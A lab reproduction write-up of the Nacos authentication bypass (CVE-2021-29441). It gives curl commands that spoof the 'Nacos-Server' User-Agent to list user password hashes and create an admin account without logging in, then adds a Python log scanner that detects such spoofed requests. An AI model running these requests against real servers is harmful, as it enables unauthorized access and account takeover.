Preface
https://github.com/alibaba/nacos/issues/4701
https://nvd.nist.gov/vuln/detail/CVE-2021-29441
Reproducing the Alibaba Nacos authentication bypass vulnerability
https://www.freebuf.com/vuls/263845.html
Environment setup
# Download the release asset (the original command pointed at the tag page, which returns HTML rather than the tarball)
wget https://github.com/alibaba/nacos/releases/download/2.0.0-ALPHA.1/nacos-server-2.0.0-ALPHA.1.tar.gz
tar -zxvf nacos-server-2.0.0-ALPHA.1.tar.gz
cd nacos/bin
./startup.sh -m standalone
Open http://ip:8848/nacos/#/login and log in with the default credentials nacos/nacos:
http://10.63.0.14:8848/nacos/#/login
Reproduction log
Step 1: List the current users
http://10.63.0.14:8848/nacos/v1/auth/users?pageNo=1&pageSize=100
Step 2: Enable authentication
Edit conf/application.properties and set nacos.core.auth.enabled to true (it is off by default, which is why Step 1 needed no login).
# Stop the running server
ps -ef | grep nacos
kill -9 <nacos-pid>
# Confirm the edited setting
cat conf/application.properties | grep nacos.core.auth.enabled
nacos.core.auth.enabled=true
# Start it again
./bin/startup.sh -m standalone
Call the API again; unauthenticated requests are now rejected:
curl -X GET 'http://10.63.0.14:8848/nacos/v1/auth/users?pageNo=1&pageSize=9'
{"timestamp":"2022-03-07T19:05:12.209+08:00","status":403,"error":"Forbidden","message":"unknown user!","path":"/nacos/v1/auth/users"}
Step 3: Bypass
Nacos identifies server-to-server requests by the User-Agent header, so a request that carries User-Agent: Nacos-Server is let through the auth filter as if it came from a peer server:
curl -X GET 'http://10.63.0.14:8848/nacos/v1/auth/users?pageNo=1&pageSize=9' -H 'User-Agent: Nacos-Server' | python -m json.tool
{
    "pageItems": [
        {
            "password": "$2a$10$EuWPZHzz32dJN7jexM34MOeYirDdFAZm2kuWj7VEOJhhZkDrxfvUu",
            "username": "nacos"
        }
    ],
    "pageNumber": 1,
    "pagesAvailable": 1,
    "totalCount": 1
}
Step 4: Create a user
The same header works for write operations, so an unauthenticated caller can add an account and then confirm it by listing users again:
curl -X POST 'http://10.63.0.14:8848/nacos/v1/auth/users?username=admin&password=admin' -H 'User-Agent: Nacos-Server' | python -m json.tool
{
    "code": 200,
    "data": null,
    "message": "create user ok!"
}
curl -X GET 'http://10.63.0.14:8848/nacos/v1/auth/users?pageNo=1&pageSize=9' -H 'User-Agent: Nacos-Server' | python -m json.tool
{
    "pageItems": [
        {
            "password": "$2a$10$EuWPZHzz32dJN7jexM34MOeYirDdFAZm2kuWj7VEOJhhZkDrxfvUu",
            "username": "nacos"
        },
        {
            "password": "$2a$10$FW35Bu3vApps1EmIm105eOuAEP2UBAxXbXtEwIpdxkEMmn/Qvr7de",
            "username": "admin"
        }
    ],
    "pageNumber": 1,
    "pagesAvailable": 1,
    "totalCount": 2
}
# User management page: http://10.63.0.14:8848/nacos/#/userManagement
The user created above is also visible there.
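As an added example that is not part of the original post, the following Python scans access-log lines for the signature of this bypass: a request that presents the Nacos-Server User-Agent on an API path but originates from a host that is not one of the cluster's own nodes. The sample log lines and the CLUSTER_NODES list are constructed assumptions; the log format is the common combined format a reverse proxy in front of Nacos would write.

```python
import re
from ipaddress import ip_address, ip_network

# Constructed sample access-log lines in combined log format (not from the original post).
SAMPLE_LOG = """\
10.63.0.14 - - [07/Mar/2022:19:05:12 +0800] "GET /nacos/v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1" 403 112 "-" "curl/7.68.0"
10.63.0.99 - - [07/Mar/2022:19:06:40 +0800] "GET /nacos/v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1" 200 245 "-" "Nacos-Server"
10.63.0.99 - - [07/Mar/2022:19:07:02 +0800] "POST /nacos/v1/auth/users?username=admin&password=admin HTTP/1.1" 200 51 "-" "Nacos-Server"
10.63.0.15 - - [07/Mar/2022:19:08:00 +0800] "GET /nacos/v1/ns/instance/list?serviceName=demo HTTP/1.1" 200 300 "-" "Nacos-Server"
10.63.0.20 - - [07/Mar/2022:19:09:00 +0800] "GET /nacos/v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1" 200 245 "-" "Mozilla/5.0"
"""

# Hypothetical list of the cluster's own nodes; only they should ever send the
# server-to-server User-Agent. Replace with the real cluster membership.
CLUSTER_NODES = [ip_network("10.63.0.15/32")]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def is_spoofed(rec, cluster=CLUSTER_NODES):
    """True when a non-cluster source claims to be a Nacos server on an API path."""
    if "Nacos-Server" not in rec["ua"]:
        return False
    if any(ip_address(rec["ip"]) in net for net in cluster):
        return False
    return rec["path"].startswith("/nacos/v1/")

def find_spoofed_requests(log_text, cluster=CLUSTER_NODES):
    """Return (source ip, method, path without query, status) for every spoofed request."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and is_spoofed(rec, cluster):
            hits.append((rec["ip"], rec["method"], rec["path"].split("?", 1)[0], rec["status"]))
    return hits

if __name__ == "__main__":
    for hit in find_spoofed_requests(SAMPLE_LOG):
        print("spoofed server User-Agent:", hit)
```

A 200 on /nacos/v1/auth/ from a non-cluster host with this User-Agent means the bypass succeeded; the same hit with a 403 indicates a patched server that was probed.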
That's it.